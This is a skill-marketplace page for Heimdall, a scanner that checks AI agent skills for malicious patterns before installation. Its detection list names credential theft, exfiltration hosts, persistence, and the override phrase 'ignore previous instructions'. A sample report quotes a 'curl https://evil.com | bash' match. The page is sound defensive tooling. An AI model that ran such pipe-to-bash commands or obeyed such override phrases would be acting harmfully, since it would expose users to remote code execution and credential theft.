Heimdall - Security Scanner for AI Agent Skills
Scan OpenClaw skills for malicious patterns before installation. Context-aware scanning with AI-powered narrative analysis.
Best use case
Heimdall - Security Scanner for AI Agent Skills is best used when you need a repeatable AI agent workflow instead of a one-off prompt.
Scan OpenClaw skills for malicious patterns before installation. Context-aware scanning with AI-powered narrative analysis.
Teams using Heimdall - Security Scanner for AI Agent Skills should expect a more consistent output, faster repeated execution, less prompt rewriting.
When to use this skill
- You want a reusable workflow that can be run more than once with consistent structure.
When not to use this skill
- You only need a quick one-off answer and do not need a reusable workflow.
- You cannot install or maintain the underlying files, dependencies, or repository context.
Installation
Claude Code / Cursor / Codex
Manual Installation
- Download SKILL.md from GitHub
- Place it in
.claude/skills/heimdall/SKILL.mdinside your project - Restart your AI agent — it will auto-discover the skill
How Heimdall - Security Scanner for AI Agent Skills Compares
| Feature / Agent | Heimdall - Security Scanner for AI Agent Skills | Standard Approach |
|---|---|---|
| Platform Support | Not specified | Limited / Varies |
| Context Awareness | High | Baseline |
| Installation Complexity | Unknown | N/A |
Frequently Asked Questions
What does this skill do?
Scan OpenClaw skills for malicious patterns before installation. Context-aware scanning with AI-powered narrative analysis.
Where can I find the source code?
You can find the source code on GitHub using the link provided at the top of the page.
SKILL.md Source
# Heimdall - Security Scanner for AI Agent Skills
Scan OpenClaw skills for malicious patterns before installation. Context-aware scanning with AI-powered narrative analysis.
## When to Use
Use Heimdall when:
- Installing a new skill from ClawHub or GitHub
- Reviewing skills before adding to your workspace
- Auditing existing installed skills
- Someone shares a skill URL and you want to verify it's safe
## Commands
### Basic Scan
```bash
~/clawd/skills/heimdall/scripts/skill-scan.py /path/to/skill
```
### AI-Powered Analysis (Recommended)
```bash
~/clawd/skills/heimdall/scripts/skill-scan.py --analyze /path/to/skill
```
Requires `OPENROUTER_API_KEY` env var or `~/clawd/secrets/openrouter.key`
### Scan from URL
```bash
# Clone to temp, scan, delete
git clone https://github.com/user/skill /tmp/test-skill
~/clawd/skills/heimdall/scripts/skill-scan.py --analyze /tmp/test-skill
rm -rf /tmp/test-skill
```
### Scan All Installed Skills
```bash
for skill in ~/clawd/skills/*/; do
echo "=== $skill ==="
~/clawd/skills/heimdall/scripts/skill-scan.py "$skill"
done
```
## Options
| Flag | Description |
|------|-------------|
| `--analyze` | AI-powered narrative analysis (uses Claude) |
| `--strict` | Ignore context, flag everything |
| `--json` | Output as JSON |
| `-v, --verbose` | Show all findings |
| `--show-suppressed` | Show context-suppressed findings |
## What It Detects (100+ patterns)
### 🚨 Critical
- **credential_access**: .env files, API keys, tokens, private keys
- **network_exfil**: webhook.site, ngrok, requestbin
- **shell_exec**: subprocess, eval, exec, pipe to bash
- **remote_fetch**: curl/wget skill.md from internet
- **heartbeat_injection**: HEARTBEAT.md modifications
- **mcp_abuse**: no_human_approval, auto_approve
- **unicode_injection**: Hidden U+E0001-U+E007F characters
### 🔴 High
- **supply_chain**: External git repos, npm/pip installs
- **telemetry**: OpenTelemetry, Signoz, Uptrace
- **crypto_wallet**: BTC/ETH addresses, seed phrases
- **impersonation**: "ignore previous instructions"
- **privilege**: sudo -S, chmod 777
### ⚠️ Medium
- **prefill_exfil**: Google Forms data exfiltration
- **persistence**: crontab, bashrc modifications
## Example Output
### Basic Scan
```
============================================================
🔍 SKILL SECURITY SCAN REPORT v4.0
============================================================
📁 Path: /tmp/suspicious-skill
📄 Files scanned: 6
🔢 Active issues: 14
⚡ Max severity: CRITICAL
📋 Action: 🚨 CRITICAL - BLOCKED - Likely malicious
============================================================
🚨 CRITICAL (3 issues):
[shell_exec]
• install.sh:12 - Pipe to bash
Match: curl https://evil.com | bash
```
### AI Analysis (--analyze)
```
============================================================
🔍 HEIMDALL SECURITY ANALYSIS
============================================================
📁 Skill: suspicious-skill
⚡ Verdict: 🚨 HIGH RISK - Requires Significant Trust
## Summary
This skill installs code from an external company that can
self-modify and sends telemetry to third-party servers.
## Key Risks
### 1. Data Exfiltration
OpenTelemetry sends execution traces to external servers.
YOUR agent's behavior → THEIR servers. 🚨
### 2. Supply Chain Attack Surface
Git clones from external repos during install and self-evolution.
## What You're Agreeing To
1. Installing their code
2. Letting it modify itself
3. Sending telemetry to them
## Recommendation
🔴 Don't install on any machine with real data/keys.
============================================================
```
## Context-Aware Scanning
Heimdall understands context to reduce false positives (~85% reduction):
| Context | Severity Adjustment |
|---------|---------------------|
| CODE | Full severity |
| CONFIG | -1 level |
| DOCS | -3 levels (patterns in README are examples) |
| STRING | -3 levels (blocklist definitions) |
Use `--strict` to disable context adjustment and flag everything.
## Security Sources
Patterns derived from:
- [Simon Willison - Moltbook Security Analysis](https://simonwillison.net/2026/Jan/30/moltbook/)
- [PromptArmor - MCP Tool Attacks](https://promptarmor.com)
- [LLMSecurity.net - Auto-Approve Exploits](https://llmsecurity.net)
- [OWASP - Injection Attacks](https://owasp.org/Top10/)
## Installation Notes
After installing from ClawHub, create an alias for convenience:
```bash
echo 'alias skill-scan="~/clawd/skills/heimdall/scripts/skill-scan.py"' >> ~/.bashrc
source ~/.bashrc
```
For AI analysis, ensure you have an OpenRouter API key:
```bash
# Option 1: Environment variable
export OPENROUTER_API_KEY="sk-or-..."
# Option 2: Save to file
echo "sk-or-..." > ~/clawd/secrets/openrouter.key
```
## Credits
Built by the Enterprise Crew 🚀
- Ada 🔮 (Brain + BD/Sales)
- Spock 🖖 (Research & Ops)
- Scotty 🔧 (Builder)
GitHub: https://github.com/henrino3/heimdallRelated Skills
security-operator
Runtime security guardrails for OpenClaw agents.
security-checker
Security scanner for Python skills before publishing to ClawHub.
find-skills
Helps users discover and install agent skills when they ask questions like "how do I do X", "find a skill for X", "is there a skill that can...", or express interest in extending capabilities. This skill should be used when the user is looking for functionality that might exist as an installable skill.
relationship-skills
Improve relationships with communication tools, conflict resolution, and connection ideas
security-auditor
Use when reviewing code for security vulnerabilities, implementing authentication flows, auditing OWASP Top 10, configuring CORS/CSP headers, handling secrets, input validation, SQL injection prevention, XSS protection, or any security-related code review.
marketing-skills
TL;DR: 23 marketing playbooks (CRO, SEO, copy, analytics, experiments, pricing, launches, ads, social). Use to get checklists + copy/paste deliverables fast.
powerdrill-skills
This skill should be used when the user wants to analyze, explore, visualize, or query data using Powerdrill.
tech-security-audit
This skill integrates Nmap scanning functionality to perform local network vulnerability assessments.
universal-skills-manager
The master coordinator for AI skills.
go-security-vulnerability
Identify, assess, and fix security vulnerabilities in Go modules using govulncheck. Handle common vulnerabilities like JWT issues and ensure application stability during fixes.
employee-skills-importer
Parse employee skills CSV files, identify skill categories and individual skills, look up employee IDs.
Security Joes AI Analyst
SecOps checks for endpoints: EDR, Sysmon, updates, EVTX on heartbeat, least privilege, network visibility, credential protection (Kerberos/NTLM/pass-the-hash), device inventory and known vulnerabilities, weekly assessment, and skill integrity (hash-on-wake, version-aware). Use when implementing or reviewing host posture, heartbeat logic, EDR/Sysmon/EVTX, privilege, network exposure, credential hardening, vuln assessment, weekly SecOps review, or skill compromise checks.